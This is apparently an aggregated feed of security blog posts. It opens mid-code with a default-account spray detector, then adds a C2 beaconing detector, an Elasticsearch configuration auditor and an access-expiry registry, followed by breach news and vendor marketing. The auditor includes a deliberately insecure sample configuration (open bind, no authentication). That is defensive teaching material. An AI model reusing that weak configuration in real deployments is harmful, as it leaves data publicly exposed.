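def detect_credential_scanners(events, window=timedelta(minutes=5), min_hosts=3, min_attempts=4):
    """Flag source IPs that try default account names against many distinct
    destinations inside a short window: the spray pattern described above.
    Returns {src: {"hosts": n, "attempts": m, "succeeded_on": [dst, ...]}}."""
    by_src = defaultdict(list)
    for e in events:
        if e["user"] in DEFAULT_USERS:
            by_src[e["src"]].append(e)
    findings = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            # slide the window start forward until it spans at most `window`
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            win = evs[start:end + 1]
            hosts = {e["dst"] for e in win}
            if len(hosts) >= min_hosts and len(win) >= min_attempts:
                findings[src] = {
                    "hosts": len(hosts),
                    "attempts": len(win),
                    # a success following a spray is the highest-priority follow-up
                    "succeeded_on": sorted({e["dst"] for e in win if e["result"] == "succeeded"}),
                }
    return findings


if __name__ == "__main__":
    for src, info in detect_credential_scanners(parse(SAMPLE_LOGS)).items():
        print(f"{src}: {info['attempts']} default-account attempts across {info['hosts']} hosts; "
              f"succeeded on {info['succeeded_on'] or 'none'}")
```

The ordinary user logging in twice to one host from 198.51.100.5 is never considered, because the detector only counts attempts against default account names; the hosts listed under succeeded_on are the ones to isolate and re-credential first.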


Fighting Command and Control with Advanced Threat Detection

In addition to having ideal targets in IoT devices, botnets like Mirai are also particularly difficult to detect and remove because, aside from occasionally making a system sluggish, they do little to make their presence known.

With this latest iteration of Mirai, along with a number of other botnets currently being deployed, threatening enterprise IoT devices, how can an organization be sure that their devices aren’t currently under the control of a bot master? Advanced threat detection solutions like Core Network Insight constantly monitor network traffic for threat behavior and activities, detecting anomalous behavior in real time and with certainty by providing definitive evidence of infections, regardless of device type. This allows security teams to take immediate action to clear bots from the system.

While this variant is new, Mirai’s C&C communication structure remains the same. Core Network Insight detects based on this type of communication, so no matter the variant, Network Insight will still be able to accurately uncover it. Network Insight is also agentless, as well as OS and platform agnostic, so no matter how many different device types are targeted, botnets like Mirai cannot evade detection.
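Bot check-ins are quiet but regular: an infected device contacts its controller on a near-fixed period, whereas human-driven traffic arrives in bursts. As an added example, and not the post’s or any vendor’s code nor a description of how Network Insight works internally, the script below groups constructed flow records by source, destination and port and flags pairs whose inter-connection gaps are both numerous and nearly constant. The records, addresses and thresholds are constructed for illustration.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed flow records (not real traffic): timestamp,source,destination,dest_port.
# 192.0.2.50 is a camera checking in with 203.0.113.99:23 roughly every 60 s;
# 192.0.2.60 is a workstation browsing normally (bursty, irregular gaps).
SAMPLE_FLOWS = """\
2019-04-02T09:00:00Z,192.0.2.50,203.0.113.99,23
2019-04-02T09:01:01Z,192.0.2.50,203.0.113.99,23
2019-04-02T09:02:00Z,192.0.2.50,203.0.113.99,23
2019-04-02T09:03:02Z,192.0.2.50,203.0.113.99,23
2019-04-02T09:03:59Z,192.0.2.50,203.0.113.99,23
2019-04-02T09:05:00Z,192.0.2.50,203.0.113.99,23
2019-04-02T09:00:10Z,192.0.2.60,198.51.100.20,443
2019-04-02T09:00:12Z,192.0.2.60,198.51.100.20,443
2019-04-02T09:04:40Z,192.0.2.60,198.51.100.20,443
2019-04-02T09:19:05Z,192.0.2.60,198.51.100.20,443
2019-04-02T09:19:07Z,192.0.2.60,198.51.100.20,443
2019-04-02T09:30:00Z,192.0.2.60,198.51.100.22,443
"""


def parse_flows(text):
    """Parse CSV flow lines into (datetime, src, dst, dport) tuples."""
    flows = []
    for line in text.splitlines():
        ts, src, dst, dport = line.split(",")
        flows.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, dst, int(dport)))
    return flows


def find_beacons(flows, min_connections=5, max_jitter=0.15):
    """Flag (src, dst, dport) groups with many connections whose gaps are highly regular.
    Regularity is the coefficient of variation (stdev / mean) of the gaps between
    consecutive connections; a low value means a metronomic check-in."""
    groups = defaultdict(list)
    for ts, src, dst, dport in flows:
        groups[(src, dst, dport)].append(ts)
    beacons = []
    for (src, dst, dport), times in groups.items():
        if len(times) < min_connections:
            continue  # too few samples to judge periodicity
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean == 0:
            continue
        jitter = statistics.pstdev(gaps) / mean
        if jitter <= max_jitter:
            beacons.append({"src": src, "dst": dst, "dport": dport,
                            "connections": len(times),
                            "period_s": round(mean), "jitter": round(jitter, 3)})
    return beacons


if __name__ == "__main__":
    for b in find_beacons(parse_flows(SAMPLE_FLOWS)):
        print(f"{b['src']} -> {b['dst']}:{b['dport']} every ~{b['period_s']}s "
              f"({b['connections']} connections, jitter {b['jitter']})")
```

The workstation’s five connections to 198.51.100.20 are not flagged because their gaps vary wildly; the camera’s six check-ins, spaced 57 to 62 seconds apart, are. In a real deployment the thresholds would be tuned against a baseline of known-good periodic traffic such as NTP and update checks, since those are regular too.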

To get more information on the only mature, purpose-built active threat detection solution on the market, or a personalized demonstration from one of our experts, contact us today.


3 Factors to Consider When Securing Big Data

Big data is the new toy in town—a technological commodity that is driving development, but is also a major point of contention between companies, users, and governing entities. But despite the name big data, it is often in the possession of small businesses, who have not taken the appropriate measures to secure this data.  When such large amounts of information are on the line, a breach of this data can be extremely detrimental.

With continual scandals being aired concerning poor privacy protections, it is even more important for your data to be protected. Consider these three things when securing big data: your specific configurations, what access you give out, and how to monitor your data.

1. Configurations

It was June of last year that the Exactis leak was revealed. Exactis, a Floridian marketing data broker, had a misconfigured Amazon ElasticSearch server that exposed close to 340 million records on both American adults and businesses. This included incredibly specific details such as pets, gender of children, and smoking habits. This leak has crippled Exactis; there is little chance that Exactis will bounce back from this event.  Beyond the effect that this leak has had on the business, Exactis CEO, Steve Hardigree, has also been open about the stream of inquiries, threats, and constant stress this has had on his personal life.

The root of this crippling leak lies in a misconfiguration, and it shows just how configurations can make or break your business. When you are planning out your big data space, you need to double- and triple-check your configurations.

Tips for Checking your Configurations:

  • Security is a multi-layered beast and your data is unique, which in turn means that your approach to security must be customized. This could mean using security software in an unconventional manner or utilizing a third-party security company.
  • Think of the little things. Do you trust all of the programming interacting with your data? If not, how can you make it a trusted resource?
  • Consider getting a third-party Network Security & Architecture Review of your environment. This allows you to have an outside opinion of exactly how secure your data is. If possible, it is beneficial to get this review at least annually.
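The Exactis story above comes down to one exposure pattern: a search cluster reachable from anywhere with no authentication in front of it. As an added example, not code from the original post or from Exactis or Elastic, the script below reads flat elasticsearch.yml-style settings and reports that pattern, showing a weak configuration beside a hardened one. Both configurations and the private address in them are constructed for illustration; the setting names (network.host, http.port, xpack.security.enabled, xpack.security.http.ssl.enabled) are real Elasticsearch keys.

```python
# Constructed example configurations (not from any real deployment).
WEAK_CONFIG = """\
cluster.name: marketing-data
node.name: es-1
network.host: 0.0.0.0      # listens on every interface
http.port: 9200
xpack.security.enabled: false
"""

HARDENED_CONFIG = """\
cluster.name: marketing-data
node.name: es-1
network.host: 10.0.5.12    # constructed private address, reachable only inside the LAN/VPC
http.port: 9200
xpack.security.enabled: true
xpack.security.http.ssl.enabled: true
"""

PUBLIC_BINDS = {"0.0.0.0", "::", "_global_"}                 # all interfaces / all public ones
LOOPBACK_BINDS = {"_local_", "127.0.0.1", "::1", "localhost"}  # Elasticsearch's safe default


def parse_flat_yaml(text):
    """Parse the flat 'key: value' lines elasticsearch.yml commonly uses.
    Nested YAML blocks are out of scope for this check; comments and blanks are skipped."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, _, value = line.partition(":")
        settings[key.strip()] = value.strip().strip("\"'")
    return settings


def audit(settings):
    """Return (severity, message) findings. A missing security key is treated as
    disabled: conservative, because the shipped defaults have differed across versions."""
    findings = []
    host = settings.get("network.host", "_local_")
    if host in PUBLIC_BINDS:
        findings.append(("HIGH", f"network.host={host}: HTTP API listens on every interface"))
    elif host not in LOOPBACK_BINDS:
        findings.append(("INFO", f"network.host={host}: reachable beyond loopback; confirm network ACLs"))
    if settings.get("xpack.security.enabled", "false").lower() != "true":
        findings.append(("HIGH", "xpack.security.enabled is not true: no authentication on the API"))
    if settings.get("xpack.security.http.ssl.enabled", "false").lower() != "true":
        findings.append(("MEDIUM", "xpack.security.http.ssl.enabled is not true: traffic is in the clear"))
    return findings


def is_exposed(settings):
    """True when the node is reachable beyond loopback AND has no authentication:
    the combination that turns a misconfiguration into a public data leak."""
    host = settings.get("network.host", "_local_")
    no_auth = settings.get("xpack.security.enabled", "false").lower() != "true"
    return host not in LOOPBACK_BINDS and no_auth


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        s = parse_flat_yaml(text)
        print(f"{name}: exposed={is_exposed(s)}")
        for sev, msg in audit(s):
            print(f"  [{sev}] {msg}")
```

A check like this belongs in the deployment pipeline, before the node ever takes traffic; the hardened file still earns an INFO because a private bind address is only as safe as the security groups and firewall rules around it.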

2. Access Granted

As you are deciding on configurations, you need to take into account who will be granted access and to what.

If the data is meant to stay completely internal, you need to decide what kinds of users are allowed what permissions. For example, who is allowed to pull data? Is anyone? If it’s not a part of the daily workload, under what circumstances is it allowed? By who?

If you are going to share your data with third parties, there is another host of questions to consider.  Do you allow them unlimited access to your data? Who do you allow access to?

Tips for Granting Internal & External Access:

  • Limit the amount of external access you allow; if possible, do not allow it at all. This will lessen your attack surface and your inherent risk.
  • External resources likely don’t need to access everything your internal resources can. Restrictive groups are a great organizational way to separate who has access to what within your environment.
  • Not all internal resources are equal and therefore should not be given the same access. You will need to evaluate how you give out access and document your process of escalating and deescalating access.

As became evident from Facebook’s admission that it left data connections open even after deals had been closed, it is also important to think about what happens when access has been revoked. What are you going to put in place to prevent access when it should no longer be allowed?

Take the access you grant seriously so you don’t end up scrambling to make changes after an incident.
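The questions above (who may pull data, under what circumstances, what happens when a partner relationship ends) are easier to answer when every grant carries an expiry and every decision is recorded. As an added example, not code from the original post or GRA Quantum, here is a default-deny access registry in which grants are time-bounded, revocation is an explicit event and an audit trail records each allow/deny. The principals, dataset name and time spans are constructed for illustration.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class Grant:
    principal: str        # user, service account or external party
    dataset: str
    permissions: frozenset
    expires: datetime     # hard expiry fixed at grant time
    revoked: bool = False


class AccessRegistry:
    """Default-deny registry: no grant means no access. Every grant is time-bounded,
    revocation is explicit, and every decision is appended to an audit trail so the
    question 'who had access when' can be answered after an incident."""

    def __init__(self):
        self.grants = []
        self.audit = []

    def grant(self, principal, dataset, permissions, ttl, now, granted_by):
        g = Grant(principal, dataset, frozenset(permissions), now + ttl)
        self.grants.append(g)
        self.audit.append((now, "GRANT", principal, dataset, sorted(permissions), granted_by))
        return g

    def revoke(self, principal, dataset, now, revoked_by):
        """Revoke every live grant for a principal on a dataset; returns how many were cut."""
        cut = 0
        for g in self.grants:
            if g.principal == principal and g.dataset == dataset and not g.revoked:
                g.revoked = True
                cut += 1
        self.audit.append((now, "REVOKE", principal, dataset, cut, revoked_by))
        return cut

    def is_allowed(self, principal, dataset, action, now):
        allowed = any(
            g.principal == principal and g.dataset == dataset
            and action in g.permissions and not g.revoked and now < g.expires
            for g in self.grants
        )
        self.audit.append((now, "ALLOW" if allowed else "DENY", principal, dataset, action))
        return allowed

    def stale_grants(self, now):
        """Grants past expiry that nobody explicitly revoked: review these periodically,
        because the expiry is what stops an old deal from becoming standing access."""
        return [g for g in self.grants if not g.revoked and now >= g.expires]


def demo():
    """Constructed scenario: an internal analyst and an external partner both get read
    access to one dataset; the partner's grant lapses, the analyst's is revoked early."""
    t0 = datetime(2019, 4, 1)
    reg = AccessRegistry()
    reg.grant("analyst.jane", "customer_profiles", {"read"}, timedelta(days=90), t0, "data-owner")
    reg.grant("vendor-acme", "customer_profiles", {"read"}, timedelta(days=30), t0, "data-owner")
    results = {
        "analyst_read": reg.is_allowed("analyst.jane", "customer_profiles", "read", t0 + timedelta(days=1)),
        "analyst_export": reg.is_allowed("analyst.jane", "customer_profiles", "export", t0 + timedelta(days=1)),
        "vendor_day10": reg.is_allowed("vendor-acme", "customer_profiles", "read", t0 + timedelta(days=10)),
        "vendor_day31": reg.is_allowed("vendor-acme", "customer_profiles", "read", t0 + timedelta(days=31)),
        "nobody": reg.is_allowed("intern.bob", "customer_profiles", "read", t0),
    }
    reg.revoke("analyst.jane", "customer_profiles", t0 + timedelta(days=20), "data-owner")
    results["analyst_after_revoke"] = reg.is_allowed(
        "analyst.jane", "customer_profiles", "read", t0 + timedelta(days=21))
    results["stale"] = [g.principal for g in reg.stale_grants(t0 + timedelta(days=31))]
    return results, reg.audit


if __name__ == "__main__":
    results, audit = demo()
    print(results)
    for entry in audit:
        print(*entry)
```

The design choice worth noting is that the partner never needs an explicit revocation to lose access: the grant expires on its own, and stale_grants surfaces it for the periodic review the tips above call for. Only the longer-lived internal grant needed a deliberate REVOKE, and that event is in the trail with who issued it.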

3. Monitoring & Alerting

For everything that can be done to your data, there should be a way for you to monitor it. That is not to say that you have to micro-manage every aspect of your big data. But if an incident were to occur, or more realistically when an incident occurs, you should be able to construct an image of what was going on at the time of the event. For this to be possible, you need a way to monitor your data and receive alerts on the incidents.

Tips for Monitoring & Alerting:

  • Adversaries do not keep normal business hours, so be sure you are monitoring your data at all hours. One way to easily achieve 24/7/365 monitoring is by outsourcing this function to a Managed Security Services Provider (MSSP).
  • When setting up alerts, it can be challenging to find a balance between “alert on every single possible event” and “I only want to see important alerts”. What if an uptick on those seemingly harmless alerts is the only tip-off to an insider threat? And on the other hand, if you are constantly on edge from alerts, you will easily fall into alert fatigue. An MSSP can act as the filter between you and your alerts, only notifying you after an alert is investigated and confirmed to be legitimate.

When you are in possession of big data, there is a lot on the line to secure.  When a breach of this magnitude can destroy your business, it’s critical you take into consideration these factors.

The post 3 Factors to Consider When Securing Big Data appeared first on GRA Quantum.

Cyber Security Roundup for March 2019

The potential threat posed by Huawei to the UK national infrastructure continues to play out. GCHQ called for a ban on Huawei technology within UK critical networks, such as 5G networks; Three said a Huawei ban would delay the UK 5G rollout; and the EU ignored US calls to ban Huawei in 5G rollouts while promoting the EU Cybersecurity certification scheme to counter the Chinese IT threat, which is all rather confusing. Meanwhile, Microsoft researchers found an NSA-style backdoor in Huawei laptops, which Microsoft reported to Huawei, leading to the flaw being patched in January 2019.
A serious security flaw placed Royal Bank of Scotland (RBS) customers at risk. The vulnerability was discovered by PenTest Partners in the bank-provided 'Heimdal Thor' security software, which was meant to protect NatWest customers from cyber-attacks but actually permitted remote command injection at the customer's endpoint. PenTest Partners said: "We were able to gain access to a victim's computer very easily. Attackers could have had complete control of that person's emails, internet history and bank details. To do this we had to intercept the user's internet traffic but that is quite simple to do when you consider the unsecured public wi-fi out there, and it's often all too easy to compromise home wi-fi setups."
 
Facebook made negative security headlines yet again after it disclosed that 20,000 of its employees had had access to hundreds of millions of user account passwords for years.

One of the world’s biggest aluminium producers, Norsk Hydro, suffered production outages after a ransomware outbreak impacted its European and US operations. Damages from the ransomware attack on Norsk Hydro reached as high as $40M.

Citrix disclosed that a security breach of its internal network may have compromised 6Tb of sensitive data. The FBI had told Citrix that international cyber criminals had likely gained access to its internal network. Citrix said in a statement that it had taken action to contain the breach: “We commenced a forensic investigation; engaged a leading cyber security firm to assist; took actions to secure our internal network; and continue to cooperate with the FBI”. According to security firm Resecurity, the attacks were perpetrated by an Iranian-linked group known as IRIDIUM.

Credit monitoring firm Equifax admitted in a report that it didn't follow its own patching schedule, neglecting to patch Apache Struts, which led to the major 2017 breach that impacted 145 million people. The report also said Equifax delayed alerting its customers for 6 weeks after detecting the breach.

ASUS computers had backdoors added through the company's software update system, in an attack dubbed “ShadowHammer”. Kaspersky researchers estimated the malware was distributed to nearly a million people, although the cybercriminals appeared to have targeted only 600 specific devices. ASUS patched the vulnerability, but questions still remain.


The top 10 biggest breaches of 2018 according to 4iQ were:
  1. Anti-Public Combo Collections – (Hacked) Sanixer Collection #1-6, 1.8 billion unique email addresses
  2. Aadhaar, India – (Open third-party device) 1.1 billion people affected
  3. Marriott Starwood Hotels – (Hacked) 500 million guests' PII
  4. Exactis – (Open device) 340 million people and businesses
  5. HuaZhu Group – (Accidental exposure) 240 million records
  6. Apollo – (Open device) 150 million app users
  7. Quora – (Hacked) 100 million users
  8. Google+ – (API glitch) 52.2 million users
  9. Chegg – (Hacked) 40 million accounts
  10. Cathay Pacific Airways – (Targeted attack) 9.4 million passengers
Barracuda Networks reported the top 12 phishing email subject lines, after they analysed 360,000 phishing emails over a three-month period.

Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach

Most people don’t think about their credit card information being stolen and sold over the dark web while they’re enjoying a night out at an Italian restaurant. However, many people are experiencing this harsh reality. Earl Enterprises, the parent company of Buca di Beppo, Planet Hollywood, Earl of Sandwich, and Mixology 101 in LA, confirmed that the company was involved in a massive data breach, which exposed the credit card information of 2.15 million customers.

The original discovery was made by cybersecurity researcher Brian Krebs, who found the underground hacking forum where the credit card information had been posted for sale. He determined that the data first surfaced on Joker’s Stash, an underground shop that sells large batches of freshly-stolen credit and debit cards on a regular basis. In late February, Joker’s Stash moved a batch of 2.15 million stolen cards onto their system. This breach involved malware remotely installed on the company’s point-of-sale systems, which allowed cybercrooks to steal card details from customers between May 23, 2018, and March 18, 2019. This malicious software was able to capture payment card details including card numbers, expiration dates, and, in some cases, cardholder names. With this information, thieves are able to clone cards and use them as counterfeits to purchase expensive merchandise such as high-value electronics.

It appears that all 67 Buca di Beppo locations in the U.S., a handful of the 31 Earl of Sandwich locations, and the Planet Hollywood locations in Las Vegas, New York, and Orlando were impacted during this breach. Additionally, Tequila Taqueria in Las Vegas, Chicken Guy! in Disney Springs, and Mixology 101 in Los Angeles were also affected by this breach. Earl Enterprises states that online orders were not affected.

While large company data breaches such as this are difficult to avoid, there are a few steps users can take to better protect their personal data from malicious thieves. Check out the following tips:

  • Keep an eye on your bank account. One of the simplest ways to determine whether someone is fraudulently using your credit card information is to monitor your bank statements. If you see any charges that you did not make, report it to the authorities immediately.
  • Check to see if you’ve been affected. If you know you’ve made purchases at an Earl Enterprises establishment in the last ten months, use this tool to check if you could have been potentially affected.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identity Theft Protection will help you monitor your accounts and alert you to any suspicious activity.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach appeared first on McAfee Blogs.

Why Traditional EDR Doesn’t Solve Today’s Modern Threats

Today’s cyberattacks are more advanced and complex than ever before. It’s no surprise that enterprises can no longer rely on traditional endpoint detection and response (EDR) solutions to protect against the evolving threat landscape. With the amount of data rapidly expanding in conjunction with an increasing number of endpoints, enterprise IT departments are facing new management and security challenges. EDR can provide businesses with another layer of threat detection in a multilayered security approach.

Cyberthreats Have Evolved, So Should Your Security

The impact of a cyberattack is no longer siloed to one employee’s device. It has the ability, speed, and scope to impact your entire business in mere seconds. And it’s hard not to think of cybersecurity as being the never-ending game of cat-and-mouse, with cybercriminals constantly developing new skills, updating code, and deploying new tactics to get inside your endpoints. But instead of your organization trying to play catch up, get ahead of malicious actors by developing a comprehensive security strategy to prevent attacks before they happen.

Many cyberthreats use multiple attack mechanisms, which means just one form of security is no longer enough to keep your entire enterprise secure from malicious actors. And although some anti-virus software can’t keep up with new malware or variants of known malware, it still plays an important role in a multilayered approach for a robust cybersecurity strategy. Endpoint detection and response is also essential when developing a comprehensive security approach. It offers a threat detection capability, allowing your next-generation solution to track down potential threats if they break through the first layer of your digital perimeter.

The Importance of EDR

The SANS Endpoint Protection and Response Survey reports that 44% of IT teams manage between 5,000 and 500,000 endpoints across their networks. Each of these endpoints becomes an open door for a potential cyberattack. Given the increasing number of endpoints, organizations are beginning to understand that they’re more susceptible to breaches and are willing to adopt a multilayered security approach to prevent as many attacks as possible.

With endpoint detection and response, organizations have granular control and visibility into their endpoints to detect suspicious activity. There are new features and services for EDR, expanding its ability to detect and investigate threats. An EDR solution can discover and block threats in the pre-execution stage, investigate threats through analytics, and help provide an incident response plan. Additionally, some EDR solutions can leverage AI and machine learning to automate the steps in an investigative process. These new capabilities can learn an organization’s baseline behaviors and use this information, along with a variety of other threat intelligence sources, to interpret findings.

Incorporating EDR Into Your Security Strategy

The adoption of EDR is projected to increase significantly over the next few years. According to Stratistics MRC’s Endpoint Detection and Response – Global Market Outlook (2017-2026), sales of EDR solutions—both on-premises and cloud-based—are expected to reach $7.27 million by 2026, with an annual growth rate of nearly 26%.

When adopting EDR into your security portfolio, the application should have three basic components: endpoint data collection agents, automated response, and analysis and forensics. McAfee MVISION Endpoint Detection and Response (EDR) helps you get ahead of modern threats with AI-guided investigations that surface relevant risks and automate and remove the manual labor of gathering and analyzing evidence.

For more information on endpoint detection and response, check out our Security Awareness page and the McAfee Endpoint Security portfolio of products.

The post Why Traditional EDR Doesn’t Solve Today’s Modern Threats appeared first on McAfee Blogs.

ST03: Cloud Technology Trends with Wayne Anderson and Dan Flaherty

In this episode, we hear Wayne Anderson, Enterprise Security Architect at McAfee, and Dan Flaherty, from the cloud security product team, speak on a wide range of topics, from upcoming technology trends in the market to adversarial machine learning, cloud models for security, and a look back at the RSA conference.

The post ST03: Cloud Technology Trends with Wayne Anderson and Dan Flaherty appeared first on McAfee Blogs.

Veracode Dynamic Analysis: Reduce the Risk of a Breach

This blog post has been updated as of April 2, 2019

Veracode Dynamic Analysis is a dynamic scanning solution that features automation, depth of coverage, and unmatched scalability. Built on microservices and cloud technologies, the Veracode Dynamic Analysis solution is available on the Veracode SaaS platform. Veracode Dynamic Analysis helps both vulnerability managers tasked with safeguarding the entire web application portfolio, and AppSec managers tasked with safeguarding critical applications in pre-production. With the frameworks developers use to build web applications changing often, and the push toward single page applications, Veracode Dynamic Analysis gives you the automated dynamic scanning you need to find vulnerabilities quickly and accurately.

Benefits of Scheduling Automation

Consistent dynamic scanning is key to keeping your web applications safe, and consistent scanning is achievable with an automated dynamic scanning solution. Imagine your CISO tells you to scan your web apps as often as feasible. Depending on remediation frequency, you come up with a quarterly, monthly, or weekly scanning schedule. To add additional complexity, IT gives you a maintenance window when dynamic scanning cannot occur. If you’re part of a global company, you also have time zones to contend with, making it virtually impossible to depend on a manual pause and resume, not to mention the inconvenience of waking up at 3:00 AM to pause a running scan. With all these variables to handle, you need a dynamic scanning solution that provides true automation to handle scheduling and IT maintenance windows, so you can “set it and forget it.” 

Recurring Scan Scheduling provides the ability to set up a schedule such that the application can be automatically scanned on a weekly, monthly, or quarterly cadence (or anything in between). Once the schedule has been set up, the dynamic scan will kick off automatically at the defined cadence. If the scan has been set up to start on a Tuesday, it will maintain that start day for the weekly scans to avoid running into weekends and holidays.

Automated Pause & Resume provides the ability to designate a maintenance window when the applications won’t be scanned. Dynamic scanning will be automatically paused when the IT maintenance window begins and automatically resume when the applications can be scanned. The pause and resume functionality has been built to ensure scanning resumes where it left off, with the goal of full coverage.

The screenshot below shows how to set up a weekly recurring scan that runs year round, pauses at midnight, and resumes at 4:00 AM each day.

  • Each week the application is dynamically scanned with the automated schedule and scan kick-off.
  • The system automatically pauses at the start of the maintenance window at 12:00 AM and resumes scanning at 4:00 AM.
  • You can adjust the duration based on the size of the application and the number of applications scanned in the batch to get the best coverage.

Authenticated Batch Scanning provides the ability to increase coverage by scanning behind the login screen, using a multitude of login mechanisms such as auto login, basic authentication, or uploading a login script. You can depend on the pre-scan feature to provide accurate feedback on the connection and authentication for the application under test, so you can fix any access issues ahead of the scheduled start time. In addition, a batch of scans can be kicked off at the same time to allow concurrent scanning with authentication. You save a lot of time when all applications can be concurrently scanned, with coverage for single page applications, modern frameworks such as Angular and ReactJS, and the ability to cover large web applications quickly.

Dynamic Analysis makes it easy to onboard applications and provides multiple input mechanisms. Uploading a CSV file is a quick way for large and small companies to take advantage of scanning applications concurrently.

Internal Scanning Management with Veracode Dynamic Analysis

There are many reasons for an application to live behind a firewall beyond the fact that it is still in development, awaiting test and quality assurance checks. Some applications are used for more sensitive financial operations and HR purposes, while others are used in highly regulated industries like healthcare and financial services. More simply, organizations use many applications internally, and there is no reason to expose them externally. Historically, the end user has had to install a Virtual Scan Appliance within their environment and send scan data through an insecure midpoint so the vendor can actually receive the data and return results.

Our Internal Scanning Management feature takes a fresh approach to this challenge by offering a completely new, IT-compliant way to access these behind-the-firewall applications. Rather than using a Virtual Scan Appliance or an on-premises scanner that is difficult to maintain and does not scale, the Veracode Dynamic Analysis scanner continues to run in the cloud and uses the Secure Scanning Gateway. This gateway connection is completely controlled by the end user. You can open the connection to scan your applications behind the firewall – and close the gateway whenever you’d like. This empowers you not only to scan applications that live behind the firewall, but to apply dynamic testing to applications in the staging environment before they are pushed into production. Below is a screenshot with a gateway and endpoint from the Veracode Platform.

 

Show Me the Results: Consolidated View

Veracode Dynamic Analysis provides visibility into the scanning process to give you peace of mind and comprehensive results once the scanning is complete. The Veracode Platform’s Triage Flaw Viewer provides CWE details, vulnerability severity, along with request/response. In addition, the Platform provides reports to show scan coverage, summary reports for executives, and detailed reports for AppSec teams.

The goal of dynamic scanning is to find exploitable vulnerabilities at runtime, and remediate the issues found. The Dynamic Flaw Inventory provides a dashboard that provides historical vulnerability information, allowing AppSec managers to track team progress toward fixing vulnerabilities. 

Veracode Dynamic Analysis gives you a solution to scan your entire portfolio of web applications with ease, provides accurate results, and puts you on the path to remediate the findings. Even if you are running static scans early in the SDLC, dynamically scanning your web application at runtime uncovers exploitable vulnerabilities that static scans won’t find. Use our dynamic scanning solution to find and remediate flaws before a hacker exploits the vulnerability, resulting in a breach.

I’d love to hear your feedback

Would Veracode Dynamic Analysis benefit your AppSec program and reduce the risk of a breach? I’d like to hear your thoughts. To learn more please download our whitepaper, "Reducing Your Risk of a Breach with Dynamic Analysis," or to schedule a demo now, click here.

How Many Web Applications Does Your Organization Have? It’s More Than You Think

“Automation has saved a tremendous amount of time. We went from a day per app to review and now we are essentially reviewing through automation 18,000 scans a day with only 20 AppSec engineers. You do the math — 18,000 deploys a day with 20 engineers — you can’t scale that manually.”

Senior manager, application and cloud security, insurance, The Total Economic Impact™ of the Veracode Application Security Platform study

One of the things we pride ourselves on here at Veracode is offering solutions and services that help add a little bit more ease to the application security process. We talk a lot about shifting left, and we do our best to put our money where our mouths are by creating a variety of integrations and automations that empower development teams to adopt a security-first mindset without sacrificing speed or agility. Yet there is more to a complete and holistic application security program than scanning in the CI/CD or making sure you’re securing open source components.

What about all of the web applications that you don’t know or simply forgot about? What about the exploitable vulnerabilities that can only be found at runtime? Or the applications that contain sensitive data and live behind the firewall? In order to ensure the security of these applications – and to make sure you have a proper inventory – you need to conduct discovery and dynamic scans.

What Do You Mean Web Applications I Don’t Know About or Forgot?

It is more common than you would imagine for organizations and brands to have more web apps than they realize – at Veracode, we help our clients create comprehensive application inventories, and find that they are, on average, comprised of roughly 30 percent more applications than clients knew about. For example, in M&A activity, more than just a company or brand is acquired – you also acquire its web assets. Further, the digital landscape is decorated with marketing promotional sites meant to attract attention.

Paul Farrington, Veracode CTO in EMEA, is familiar with how common it is to underestimate the extent and reach of an organization’s IT assets. In a project that Veracode conducted for a high street bank, we discovered 1,800 websites that had yet to be logged.

“Their perimeter can be 50% larger than they originally thought it was,” Farrington told the BBC.

It's impossible to secure an entire web application attack surface if you don’t know about all of your applications, and the very thing meant to draw attention to your brand and boost your bottom line is the same target attackers go after to infiltrate your organization. According to the 2018 Verizon Data Breach Investigations Report, web applications continue to be the number one vector for reported breaches. In nearly 90 percent of breaches, it took only minutes for attackers to gain access – and it took months for nearly 70 percent of organizations to detect the systems that had been compromised.

Securing ALL of Your Web Applications With Veracode Discovery + Veracode Dynamic Analysis

Without a solution to help you discover these web applications, you can never be completely certain that you have scanned all of your web applications. This is where Veracode Discovery can help.

Veracode Discovery is a threat intelligence solution that leverages IP ranges, host names, keywords, and other inputs to scan the web for every web application that may be associated with your organization. The results are uploaded to the Veracode Application Security Platform where users can sort through the findings and input them into Veracode Dynamic Analysis through an easy-to-follow workflow. This ensures that you have full visibility into what your organization owns and that you are able to either scan and remediate those applications or sunset them, which improves the organization’s overall security posture.

Veracode Dynamic Analysis is fast, but it’s not just about the speed at which a scan returns results. It’s about the complete workflow – scan start, scan complete, and through to remediation. Veracode Dynamic Analysis is fast because of scheduling automation and a single upload that allows you to batch upload multiple applications into the same analysis. As a SaaS solution, Veracode Dynamic Analysis is able to kick off a scan for hundreds of applications at the same time. Unlike other solutions on the market, Veracode Dynamic Analysis can concurrently scan both authenticated and unauthenticated applications both in front of and behind a firewall. What’s more, the results that you receive are immediately actionable: they contain less than 1 percent false positives thanks to the accuracy of our scanner and limited manual scrubbing.

Veracode Dynamic Analysis covers a wide variety of application frameworks, including Single Page Applications, JavaScript apps, HTML5, Angular, and ReactJS. This gives you the reassurance that Veracode Dynamic Analysis will be able to return results on your applications and provide you with actionable results.

To learn more about Veracode Dynamic Analysis, download our whitepaper, Reducing Your Risk of a Breach with Dynamic Analysis.

The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams

